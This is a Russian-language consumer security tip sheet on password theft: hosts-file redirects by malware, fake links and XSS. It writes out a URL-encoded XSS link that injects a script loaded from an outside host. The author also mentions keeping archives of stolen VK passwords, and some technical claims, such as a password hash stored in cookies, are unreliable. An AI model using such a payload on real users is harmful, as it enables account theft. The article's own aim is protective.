Находясь в сети мы все вынуждены часто проходить такой процесс, как регистрация себя любимого на каком-нибудь сайте. В последнее время регистрация пользователя стала обязательным процессом на многих ресурсах (одни без регистрации не пускают внутрь вообще, как то всякие социальные сети, другие только после регистрации открывают доступ к контенту, например торент-трекеры).

Каждый раз мы становимся перед выбором, какой же пароль задать. При этом львиная доля пользователей, почему-то предпочитает простоту безопасности. А зря 

Чем грозит подобное халатное отношение при регистрации? В первую очередь тем, что простые пароли вскрываются в два клика. В сети есть масса сайтов, где можно ввести хеш(зашифрованное представление вашего пароля) и получить его (пароль) в первозданном виде. Как можно «подарить» свой хеш злоумышленнику я опишу ниже, а пока запомните – уже давно есть множество словарей паролей, в которых Ваш скорее всего уже тоже есть(как показала практика, оригинальностью нынешние пользователи не страдают). Следовательно, пароль Ваш вскроют очень легко. Спросите, «Да кому нужен мой аккаунт, в тех же контактах?» – отвечу, кому-то да будет нужен.

Уверен, каждый хоть раз получал спам от друзей в личных сообщениях 

Ну да ладно, задали Вы при регистрации нормальный, хорошо защищенный пароль, но в один прекрасный момент понимаете что его увели. Сразу возникает вопрос «КАК?! Я же поставил пароль из 16 символов и использованием спецсимволов и букв в разном регистре!».

Ниже я приведу немного примеров, как можно (но не нужно) попасться:

 

• Проверяйте содержимое файда hosts (c:/windows/system32/drivers/ets/hosts) на своем компьютере. В нормальном случае там не должно быть ничего, кроме записи о 127.0.0.1 . Тот же контакт, ломали массово, с помпой два раза, и оба раза сотни аккаунтов пользователей утекли из-за того, что вирус дописывал в файл hosts редирект для контакта, и, когда пользователь заходил на страницу авторизации, он на самом деле попадал на хост злоумышленника, где добровольно «сливал» свой пароль(размреры файла с паролями росли в геометрической прогрессии). У автора до сих пор хранится два архива(они до сих пор доступны для скачивания) с контаковскими паролями очень многих пользователей, и, Вы не поверите, но большая часть из них, т.е. паролей, вполне валидна 
• Всегда смотрите что за ссылки Вам присылают. В большинстве случаев вы получаете линки на фейковые странички, где ничего хорошего, кроме геморроя, Вы не найдете. Наиболее популярным является момент, когда делают фейк известного домена, там располагают скрипт, который загружает вирус Вам в машину, а дальше все зависит от фантазии разработчика виря . Либо ломается сайт, вписывается туда iframe через который происходит загрузка всякого мусора на компьютер жертвы.
• В дополнение к предыдущему, хочется отдельно вынести такой класс угона, как XSS. Кому интересно что это – гуголь в помощь. Я же расскажу как обезопасить себя от такого. Итак, если Вам дают ссылку, примерно вот такого вида : http://имя_сайта/чего-то там?%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E почти со 100% уверенностью можно сказать что Вас разводят на XSS. Фишка в том, что перейдя по этой ссылке, Вы подарите хеш своего пароля(а он хранится в кукисах браузера) злоумышленнику, который далее расшифрует хеш и ваш пароль станет достоянием общественности. Особо опасайтесь ссылок на википедию, коскольку они очень похоже выглядят. Всегда смотрите на домен – соответствует ли он действительности.

Эти нехитрые советы помогут Вам сберечь Ваши личные данные, находясь в сети. Удачи.

Источник: http://safeweb.com.ua/?p=431